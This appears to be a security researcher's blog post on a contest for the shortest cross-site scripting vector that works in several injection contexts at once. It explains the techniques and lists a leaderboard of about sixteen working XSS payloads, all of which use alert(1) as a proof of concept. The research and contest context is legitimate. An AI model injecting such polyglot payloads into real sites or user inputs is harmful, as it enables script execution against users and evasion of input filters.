Multi-context XSS injection contest

I started to wonder a while ago how you could produce a vector that executed in many contexts. It’s cool because you can limit the number of requests an automated scanner uses without a high failure rate, you can even reduce the failure rate by making it as small as possible because some filters have a length limit. What does a multi-context vector look like I hear you ask?


'-/"/-alert(1)//'


That vector would work in both a single quoted script context and double quote. This idea spawned a contest to decide what was the smallest vector. I thought the original vector I posted couldn’t be beaten and I thought the challenge was impossible. @shafigullin proved me wrong 🙂 The first contest is here.

My original vector was:
</script><svg onload='-/"/-alert(1)//'

The closing script breaks out of a script injection that filters quotes but doesn’t filter < and >, svg is used for the html context in both instances and the single and double quotes handle script injections where single or double quote isn’t filtered. The trick is building a vector that is valid syntax in each context otherwise it won’t execute. Originally @shafigullin said the challenge was also impossible but after a small delay he posted this cool vector:


</script><svg '//"
onload=alert(1)//


The clever use on comments and placing quotes inside the attribute space and using the fact that a new line is a new statement and the attribute onload is also valid JavaScript assignment. We concluded that the minimum length would be 36. Prove us wrong 🙂

After that challenge I decided to create another one that used more contexts and made it trickier to execute. Same as before but with an anchor to click and a new script vector that removed characters as well. The anchor itself didn’t require much to execute since the html encoding would still work however it would not render if the markup before consumed it making it a subtle problem. I retained everyone’s valid vectors not the exact order they were sent to me but still a history of each one is nice to have to see how the contest progressed.

@insertScript 38 </script>"//'//<svg%0Aonload=alert(1)//> (IE9)
(current winner)
@theharmonyguy 38 '//</script><svg%20"%0aonload=alert(1)%20//>
@shafigullin 38 </script>'//<svg "%0Aonload=alert(1) //>
@theharmonyguy 39 '//</script><svg "%0Aonload=alert(1)// />
@insertScript 39 </script>"//'//<svg%0Aonload=alert(1) //>
@shafigullin 39 </script>'//<svg "%0Aonload=alert(1)// />
@insertScript 40 </script "//'//><svg%0Aonload=alert(1)//>
@theharmonyguy 41 ';//</script><svg ";%0Aonload=alert(1)// />#
@shafigullin 41 </script><img src '//"%0Aonerror=alert(1)//
@garethheyes 42 </script><svg onload='-/"/-[alert(1)]//'/>
@shafigullin 42 </script><img '//"%0Aonerror=alert(1)// src>
@shafigullin 44 </script><img '//"%0Aonerror=alert(1)// src=1>
@insertScript 44 </script "/*'/*><svg */; onload=alert(1) //>
@0xAli 47 </script><script>/*"/*'/**/;alert(1)//</script>#
@insertScript 50 </script "/*'/*><img/src=x */; onerror=alert(1) //
@0xAli 56 </script><script>/*var a="/*""'/**/;alert(1);//</script>

You can try the challenge yourself here don’t expect me to update the leader board though unless you break the 38 limit 🙂

In summary challenges are great because they are fun and can answer what you think are impossible questions and help you interact with some amazing researchers and find techniques that you didn’t think of. Finally well done @insertScript for winning this contest as he was the fastest to 38 and produced an awesome vector.